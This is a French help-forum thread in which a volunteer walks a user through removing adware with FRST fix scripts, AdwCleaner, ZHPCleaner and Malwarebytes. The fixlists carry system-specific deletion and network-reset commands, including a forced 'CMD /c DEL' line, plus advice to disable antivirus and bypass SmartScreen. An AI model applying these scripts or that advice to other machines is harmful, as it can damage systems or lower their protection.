2015-12-16 23:34 - 2015-12-16 23:34 - 00003108 _____ C:\Windows\System32\Tasks\{80ED55F8-296C-45A6-9739-231C9BBA3888}
2016-01-06 08:21 - 2016-01-06 08:21 - 0032038 _____ () C:\Users\MARIE\AppData\Roaming\Edge.ico
2016-01-06 08:21 - 2016-01-06 08:19 - 0013752 _____ (Microsoft) C:\Users\MARIE\AppData\Roaming\LaunchBrowser_ed.exe
2016-01-06 08:21 - 2016-01-06 08:19 - 0000182 _____ () C:\Users\MARIE\AppData\Roaming\LaunchBrowser_ed.exe.config
C:\ProgramData\Dlaauafoomg
C:\Program Files\Web Shield
cmd: ipconfig /flushdns
cmd: netsh winsock reset
EmptyTemp:
end

  • Enregistre le fichier au même endroit que FRST= ton bureau /!\Important/!\ sous le nom fixlist.txt
  • Ferme toutes les applications, y compris ton navigateur
  • Double-clique sur FRST.exe
    /!\ Sous Vista, Windows 7 , 8.1 et 10, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
  • Sur le menu principal, clique une seule fois sur Corriger et patiente le temps de la correction
  • L'outil va créer un rapport de correction Fixlog.txt. Poste ce rapport dans ta réponse.
Redémarre ton ordinateur s'il ne le fait pas automatiquement


 Héberge ce rapport sur ce site d'hébergement de fichiers et indique les liens fournis dans ta réponse. Aide en images


/!\ Ce script a été établi pour cet utilisateur, il ne doit, en aucun cas, être appliqué sur un autre système, au risque de provoquer de graves dysfonctionnement et endommager Windows /!\



***


=> AdwCleaner- Scanner:

/!\ Ne passe l'outil qu'une seule fois afin de ne pas fausser le rapport /!\

  • Télécharge AdwCleaner de Xplode et enregistre le fichier sur ton Bureau
  • Ferme toutes les applications, y compris ton navigateur
  • Double-clique sur l'icône AdwCleaner.exe pour lancer l'installation
    /!\ Sous Vista, Windows 7 , 8.1 et 10, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
  • Sur le menu principal, clique sur Scanner
  • Les éléments détectés s'affichent dans les différents onglets. Clique sur Rapport
  • Un rapport AdwCleaner(S).txt s'ouvre. Poste ce rapport dans ta prochaine réponse
    Le rapport se trouve sous C:\AdwCleaner(S).txt
Aide en image pour AdwCleaner



***

deux rapports attendus
--> Fixlog.txt
--> AdwCleaner(S).txt --> mode scanner/rechercher

Hors ligne delph

  • Membres
  • Members
  • Messages: 27
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #8 le: janvier 13, 2016, 21:38:01 »
bonjour,
Merci de votre message.
Voici le lien pour le rapport fixlog

http://up.security-x.fr/file.php?h=R721a6db5b4d08a511aee75630e9fdfb2

A bientôt

Hors ligne delph

  • Membres
  • Members
  • Messages: 27
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #9 le: janvier 14, 2016, 13:03:57 »
Bonjour,
Voici le 2eme rapport:

http://up.security-x.fr/file.php?h=Racbd4f170698e082d8641a03519e0790

merci
A bientôt

Hors ligne xsun

  • Formateur
  • Mega Power Members
  • ****
  • Messages: 3518
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #10 le: janvier 14, 2016, 17:27:57 »
re

tu vas créer un point de restauration (on les supprime à la fin) --> nomme le de façon à savoir que c'est le point de restauration avant les suppressions
créer un point de restauration vista
créer un point de restauration seven
créer un point de restauration Windows 8.1
créer un point de restauration Windows 10

AdwCleaner - Correction/Suppression

/!\ Ne passe l'outil qu'une seule fois afin de ne pas fausser le rapport /!\

  • Ferme toutes les applications, y compris ton navigateur
  • Double-clique sur l'icône AdwCleaner.exe
    /!\ Sous Vista, Windows 7 , 8.1 et 10/b], il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
  • Sur le menu principal, clique sur Scanner
  • Les éléments détectés s'affichent dans les différents onglets. Clique sur Nettoyer et valide par OK la fermeture des programmes
  • Patiente le temps de l'analyse et valide le message d'informations
  • Un redémarrage est demandé, valider par OK
  • Au redémarrage, un rapport AdwCleaner(C).txt s'ouvre. Poste ce rapport dans ta prochaine réponse
    Le rapport se trouve sous C:\AdwCleaner(C).txt
Sous IE, le filtre SmartScreen déclenche une alerte. Cliquer sur Actions puis sur Exécuter quand même

Héberge ce rapport sur ce site d'hébergement de fichiers et indique les liens fournis dans ta réponse. Aide en images

Si ton antivirus émet une alerte ou bloque l'outil, il faut le désactiver temporairement (le fichier AdwCleaner.exe est sûr)
Aide en image pour AdwCleaner



***


ZHPCleaner-Scanner

/!\ Ne passe l'outil qu'une seule fois afin de ne pas fausser le rapport /!\

  • Télécharge ZHPCleaner de Nicolas Coolman en cliquant sur le bouton bleu "Télécharger" et enregistre-le sur le Bureau
  • Ferme toutes les applications, y compris le navigateur
  • Double-clique sur l'icône ZHPCleaner.exe
    /!\ Sous Vista, Windows 7 , 8.1 et 10, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
  • Accepte, après l'avoir lu, l'accord de licence en cliquant sur J'accepte
  • Clique sur le bouton Scanner

  • Poste le rapport obtenu ZHPCleaner.txt qui s'affiche.
Tutoriel d'utilisation ZHPCleaner en images


Héberge ce rapport sur ce site d'hébergement de fichiers et indique les liens fournis dans ta réponse. Aide en images


***

deux rapports attendus
--> C:\AdwCleaner(C).txt --> mode correction/suppression
--> ZHPCleaner.txt --> mode scanner/rechercher

Hors ligne xsun

  • Formateur
  • Mega Power Members
  • ****
  • Messages: 3518
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #11 le: janvier 17, 2016, 05:29:25 »
re

des difficultés pour continuer la procédure ?

Hors ligne delph

  • Membres
  • Members
  • Messages: 27
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #12 le: janvier 17, 2016, 14:00:16 »
Bonjour
merci.

OK pour ADWCleaner mais je ne comprends pas ce que je dois faire avec IE filtre smartscreen?

A bientôt

Hors ligne xsun

  • Formateur
  • Mega Power Members
  • ****
  • Messages: 3518
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #13 le: janvier 17, 2016, 19:22:42 »
re

Citer
je ne comprends pas ce que je dois faire avec IE filtre smartscreen?

rien, comme tu utilises Chrome  ;)
ce message s'adresse pour ceux/celles qui utilise IE

Il faut que tu postes les  rapports, c'est important pour ton système

--> C:\AdwCleaner(C).txt --> mode correction/suppression
--> ZHPCleaner.txt --> mode scanner/rechercher



Hors ligne xsun

  • Formateur
  • Mega Power Members
  • ****
  • Messages: 3518
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #15 le: janvier 21, 2016, 08:10:15 »
re

très bien

ZHPCleaner-Nettoyer


/!\ Ne passe l'outil qu'une seule fois afin de ne pas fausser le rapport /!\

  • Ferme toutes les applications, y compris le navigateur
  • Double-clique sur l'icône ZHPCleaner.exe
    /!\ Sous Vista, Windows 7 , 8.1 et 10, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
  • Clique sur le bouton Scanner et patiente le temps de l'analyse, puis clique sur le bouton Nettoyer
  • L'interface de réparation s'affiche, clique sur Nettoyer. Le nettoyage se lance
    [
  • Patiente le temps du nettoyage
  • Si un redémarrage est nécessaire pour compléter le nettoyage, clique sur OK et redémarre le système
  • Au redémarrage, le rapport de nettoyage ZHPCleaner.txt s'affiche. Poste le rapport obtenu.

    Sous IE et Edge, le filtre SmartScreen peut déclencher une alerte. Cliquer sur Actions puis sur Exécuter quand même

    Tutoriel d'utilisation ZHPCleaner en images
Héberge ce rapport sur ce site d'hébergement de fichiers et indique les liens fournis dans ta réponse. Aide en images


***


Malwarebytes

/!\ Ne passe l'outil qu'une seule fois afin de ne pas fausser le rapport /!\

  • Télécharge Malwarebytes Anti-Malware et enregistre le sur le Bureau (choisis la version gratuite)
  • Double-clique sur le fichier mbam-setup.exe pour lancer l'installation
    /!\ Sous Vista, Windows 7 , 8.1 et 10, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
  • Choisis ta langue et accepte la licence
  • A la fin de l'installation, décoche l'option "Activer l'essai gratuit de Malwarebytes Anti-Malware Premium". La case Exécuter Malwarebytes Anti-Malware reste cochée.
  • Clique sur Terminer. Malwarebyte's s'ouvre
  • Pour mettre en français s'il est en anglais, dans Settings, puis General Settings, dans Language, sélectionne French
  • Dans le tableau de bord qui s'ouvre, la Version de la base de données doit se mettre à jour, si non, clique sur le lien Mettre à jour pour installer les mises à jour et laisse l'outil les installer
  • Dans Paramètres, puis Détection et protection, sélectionne Traiter les détections comme des malveillants pour les détections PUP et PUM
  • Dans Examen, coche Analyse des Menacessi elle n'est pas sélectionnée, puis clique sur Lancer l'analyse
  • Si l'outil te propose d'autres mises à jour, valide en cliquant sur Mettre à jour maintenant
  • Patiente le temps de l'analyse
  • Pour supprimer les éléments détectés, clique sur Tout mettre en quarantaine
  • Si un redémarrage est demandé, clique sur Yes
  • Au redémarrage, relance Malwarebytes
  • Dans Historique, clique sur Journaux de l'application
  • Sélectionne le journal d'examen le plus récent , puis clique sur Afficher
  • ce rapport commence comme ceci --> Malwarebytes Anti-Malware / www malwarebytes org / Date de l'analyse / Heure de l'analyse / Fichier journal / Administrateur
  • Clique sur Exporter puis sur Fichier texte (*.txt)
  • Enregistre le rapport sur ton Bureau. Poste ce rapport dans ta prochaine réponse
Le journal d'examen est aussi enregistré sous C:\ProgramData\Malwarebytes\Malwarebytes' Anti-Malware\Logs[/list]

Tutoriel d'utilisation Malwarebytes Aide en images

JOURNAL D'ANALYSE de Malwarebytes --> Exporter le rapport d'analyse

Héberge ce rapport sur ce site d'hébergement de fichiers et indique les liens fournis dans ta réponse. Aide en images


***

deux rapports attendus
--> ZHPCleaner.txt  --> mode nettoyer/supprimer
--> Malwarebytes --> rapport d'analyse


Hors ligne xsun

  • Formateur
  • Mega Power Members
  • ****
  • Messages: 3518
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #17 le: janvier 22, 2016, 08:32:32 »
re

tu m'as donné deux fois le rapport de ZHPCleaner

Peux tu poster le rapport de Malwarebytes: JOURNAL D'ANALYSE de Malwarebytes --> Exporter le rapport d'analyse


***

comment se comporte ton système ?

Hors ligne delph

  • Membres
  • Members
  • Messages: 27
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #18 le: janvier 22, 2016, 21:38:40 »

Hors ligne xsun

  • Formateur
  • Mega Power Members
  • ****
  • Messages: 3518
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #19 le: janvier 23, 2016, 07:55:26 »
re

ouvre  Malwarebytes  (clic droit exécuter en tant qu'administrateur)
clique sur l'onglet Historique puis --> Quarantaine et cliques sur Supprimer tout


***


comment se comporte ton système ?


***


Un dernier effort avant de conclure  ;)
j'aimerais vérifier quelque chose

Peux tu refaire FRST, clic droit sur FRST.exe (Exécuter en tant qu'administrateur), coche la case Addition.txt et poste les deux nouveaux rapports
--> FRST.txt
--> Addition.txt



Hors ligne xsun

  • Formateur
  • Mega Power Members
  • ****
  • Messages: 3518
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #21 le: janvier 26, 2016, 09:16:39 »
re

Citer
Merci :sup:

je suppose que cela signifie que ton ordinateur se comporte mieux

Est ce que tu te connectes à un compte Google avec Chrome ?

Hors ligne xsun

  • Formateur
  • Mega Power Members
  • ****
  • Messages: 3518
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #22 le: janvier 30, 2016, 08:46:06 »
re

tu en est où ?

car ce n'est pas fini ...

Hors ligne delph

  • Membres
  • Members
  • Messages: 27
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #23 le: janvier 31, 2016, 17:25:05 »
Bonjour,

Merci cela va mieux..
Oui pour Google chrome.

Désolé pour le délai
A bientot

Hors ligne xsun

  • Formateur
  • Mega Power Members
  • ****
  • Messages: 3518
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #24 le: février 01, 2016, 10:27:27 »
re

Citer
Oui pour Google chrome

il faut donc supprimer les données synchronisées de ton compte Google (les données seront toujours disponibles dans Chrome sur tes appareils)

--> Ouvre Google Dashboard. Assure-toi d'être connecté à ton compte Google.
--> Clique sur Réinitialiser la synchronisation pour arrêter la synchronisation et effacer toutes les données synchronisées.
--> Clique sur OK.
Option 2 : Interrompre la synchronisation et supprimer les données synchronisées (réinitialiser la synchronisation)

ou bien
Supprimer les informations synchronisées de votre compte
(Toutes les informations synchronisées sont alors supprimées de votre compte Google. Tous vos favoris, vos applications et vos extensions demeurent sur votre Chromebook)


***

Une fois la suppression des données synchronisées faite


--> Ouvre le Bloc-notes Aide en image pour ouvrir le bloc note windows 8
Copie/colle la totalité du contenu de la zone Code ci-dessous dans le Bloc-notes
--> de start inclus dans le copié à end inclus dans le copié

start
CreateRestorePoint:
CloseProcesses:
Task: {8A6DDF93-72DE-43CD-978C-9CE076553EE3} - \{80ED55F8-296C-45A6-9739-231C9BBA3888} -> Pas de fichier <==== ATTENTION 
Task: {AC674866-5B68-4BA6-A1BB-13DBEE156669} - \Woeno -> Pas de fichier <==== ATTENTION 
ShortcutWithArgument: C:\Users\Public\Desktop\Booking.com.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.booking.com/index.en-us.html?aid=398438&label=dticon
HKLM\...\RunOnce: [ZHPCleaner_Folder1] => CMD /c DEL "C:\Windows\System32\config\systemprofile\AppData\Local\WebBar" /F /Q
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
CHR HomePage: Default -> hxxp://www.oursurfing.com/?type=sy&ts=1439716213&z=1b402b73c9149486e8baeb9gbz3c3tam0g3q9o9g0c&from=age&uid=ST1000LM024XHN-M101MBB_S31LJ9AG316460
C:\Windows\System32\config\systemprofile\AppData\Local\WebBar
EmptyTemp:
end

  • Enregistre le fichier au même endroit que FRST= ton bureau /!\Important/!\ sous le nom fixlist.txt
  • Ferme toutes les applications, y compris ton navigateur
  • Double-clique sur FRST.exe
    /!\ Sous Vista, Windows 7 , 8.1 et 10, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
  • Sur le menu principal, clique une seule fois sur Corriger et patiente le temps de la correction
  • L'outil va créer un rapport de correction Fixlog.txt. Poste ce rapport dans ta réponse.
Redémarre ton ordinateur s'il ne le fait pas automatiquement


 Héberge ce rapport sur ce site d'hébergement de fichiers et indique les liens fournis dans ta réponse. Aide en images

un rapport attendu
--> Fixlog.txt

Hors ligne xsun

  • Formateur
  • Mega Power Members
  • ****
  • Messages: 3518
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #25 le: février 04, 2016, 21:15:53 »
 :AAC

toujours là ?

Hors ligne delph

  • Membres
  • Members
  • Messages: 27
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #26 le: février 28, 2016, 22:52:07 »

Hors ligne xsun

  • Formateur
  • Mega Power Members
  • ****
  • Messages: 3518
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #27 le: février 29, 2016, 22:19:07 »
re

Faire le fix de FRST 27 jours après la demande, fait qu'il ne représente plus ton système aux environs du 1er février,
même s'il a fonctionné pour les éléments du fix, il est valable à un instant T, car près d'un mois après, ton système n'est plus le même
d'autres éléments auraient peut être été inclus ....


comment se comporte ton système ?

Tags: pub spam